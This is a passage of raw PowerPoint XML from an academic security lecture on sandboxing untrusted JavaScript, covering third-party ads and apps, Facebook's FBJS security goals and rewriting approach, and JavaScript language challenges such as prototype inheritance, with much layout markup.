          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Kanellakis Lecture, Brown Univ.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>http://seclab.stanford.edu     </a:t>
            </a:r>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Sandboxing Untrusted JavaScript</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10243" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1295400" y="1219200"/>
            <a:ext cx="6400800" cy="5117266"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="none" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5410200" y="4038600"/>
            <a:ext cx="2133600" cy="1981200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">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7543800" y="4800600"/>
            <a:ext cx="609600" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="860000"/>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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Social Networking Sites</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11268" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect l="7829" t="9195" r="9515" b="20307"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="1143000"/>
            <a:ext cx="7239000" cy="5257800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="none" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Date Placeholder 4"/>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6" name="Slide Number Placeholder 5"/>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19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Footer Placeholder 6"/>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
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5410200" y="1981200"/>
            <a:ext cx="2362200" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">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H="1">
            <a:off x="7772400" y="2286000"/>
            <a:ext cx="609600" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="860000"/>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ohn Mitchell\My Documents\misc\kanellakis-family.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="803275" y="2057400"/>
            <a:ext cx="4302125" cy="3175000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4099" name="Picture 3" descr="C:\Documents and Settings\John Mitchell\My Documents\misc\Kan_photo.gif"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6057900" y="2057400"/>
            <a:ext cx="2247900" cy="316992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Third-party content: Ads</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12291" name="laptop"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="1828800"/>
            <a:ext cx="5105400" cy="41148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pic>
        <p:nvPicPr>
          <p:cNvPr id="12292" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="1981200"/>
            <a:ext cx="3276600" cy="2384425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12293" name="Picture 4" descr="C:\Documents and Settings\John Mitchell\Local Settings\Temporary Internet Files\Content.IE5\ZR24IX3M\MCj04348450000[1].png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5257800" y="2133600"/>
            <a:ext cx="1714500" cy="1714500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Can 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7554913" y="1905000"/>
            <a:ext cx="1284287" cy="1676400"/>
          </a:xfrm>
          <a:prstGeom prst="ca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Customer accounts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12295" name="Picture 9" descr="C:\Documents and Settings\John Mitchell\Local Settings\Temporary Internet Files\Content.IE5\DCKGN2VX\MCj04352420000[1].png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6132513" y="4572000"/>
            <a:ext cx="1270000" cy="2514600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12296" name="TextBox 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7402513" y="5334000"/>
            <a:ext cx="1436687" cy="708025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Advertising network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Down Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6819900" y="2552700"/>
            <a:ext cx="304800" cy="5334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p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="8578543">
            <a:off x="6375400" y="3756025"/>
            <a:ext cx="304800" cy="693738"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C00000"/>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429000" y="2590800"/>
            <a:ext cx="609600" cy="17240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219200" y="2514600"/>
            <a:ext cx="1981200" cy="17430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rot="5400000">
            <a:off x="4762500" y="2628900"/>
            <a:ext cx="304800" cy="5334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Date Placeholder 14"/>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16" name="Slide Number Placeholder 15"/>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20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Footer Placeholder 16"/>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
        <p:nvSpPr>
          <p:cNvPr id="20" name="Down Arrow 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4762500" y="2705100"/>
            <a:ext cx="3048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Third-party content: Apps</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1028" name="laptop"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="1828800"/>
            <a:ext cx="5105400" cy="41148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pic>
        <p:nvPicPr>
          <p:cNvPr id="1029" name="Picture 4" descr="C:\Documents and Settings\John Mitchell\Local Settings\Temporary Internet Files\Content.IE5\ZR24IX3M\MCj04348450000[1].png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5257800" y="2133600"/>
            <a:ext cx="1714500" cy="1714500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Can 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7554913" y="1905000"/>
            <a:ext cx="1284287" cy="1676400"/>
          </a:xfrm>
          <a:prstGeom prst="ca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User data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1031" name="Picture 9" descr="C:\Documents and Settings\John Mitchell\Local Settings\Temporary Internet Files\Content.IE5\DCKGN2VX\MCj04352420000[1].png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6132513" y="4572000"/>
            <a:ext cx="1270000" cy="2514600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1032" name="TextBox 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7391400" y="5080000"/>
            <a:ext cx="1436688" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="860000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User-supplied application</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1026" name="Object 2"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1143000" y="2133600"/>
          <a:ext cx="3144838" cy="2143125"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <p:oleObj spid="_x0000_s1026" name="Acrobat Document" r:id="rId5" imgW="2664000" imgH="2131200" progId="AcroExch.Document.7">
              <p:embed/>
            </p:oleObj>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1200150" y="2933700"/>
            <a:ext cx="1685925" cy="7048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143000" y="2133600"/>
            <a:ext cx="3143250" cy="215265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Date Placeholder 14"/>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16" name="Slide Number Placeholder 15"/>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21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Footer Placeholder 20"/>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
        <p:nvSpPr>
          <p:cNvPr id="22" name="Down Arrow 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6819900" y="2552700"/>
            <a:ext cx="304800" cy="5334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rot="8578543">
            <a:off x="6375400" y="3756025"/>
            <a:ext cx="304800" cy="693738"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C00000"/>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rot="5400000">
            <a:off x="4762500" y="2628900"/>
            <a:ext cx="304800" cy="5334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rot="5400000">
            <a:off x="4762500" y="2705100"/>
            <a:ext cx="3048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685800" y="2919413"/>
            <a:ext cx="7772400" cy="1500187"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="960000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JavaScript Sandboxing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="4800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="960000"/>
              </a:solidFill>
            </a:endParaRPr>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22</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mtClean="0"/>
              <a:t>Facebook FBJS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119811" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Facebook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> applications are “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>iframed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>” or integrated on page </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We are interested in integrated applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Integrated applications are written in FBML/FBJS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Facebook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> subsets of HTML and JavaScript.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>FBJS is served from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Facebook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, after filtering and rewriting.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Facebook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> libraries mediate access to the DOM. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Security goals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No direct access to the DOM.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No tampering with the execution environment </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No tampering with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Facebook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> libraries.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Basic approach</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Blacklist variable names that are used by containing page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Prevent access to global scope object, since property names cannot be renamed and variables are properties of scope objects</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Date Placeholder 7"/>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9" name="Slide Number Placeholder 8"/>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23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Footer Placeholder 9"/>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descr="fb.png                                                         0007EFE5Macintosh HD                   C27C8CF9:"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1689100" y="533400"/>
            <a:ext cx="6527800" cy="5562600"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Date Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Kanellakis Lecture, Brown Univ.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{EF456079-A434-4970-9984-93BA84FACEF2}"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Sandboxing Untrusted JavaScript</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smtClean="0"/>
              <a:t>JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>hallenges</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106499" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Prototype-based object inheritance:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>Object.prototype.a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Objects as mutable records of functions with implicit self parameter:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>o={b:function(){return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>this.a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>}}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
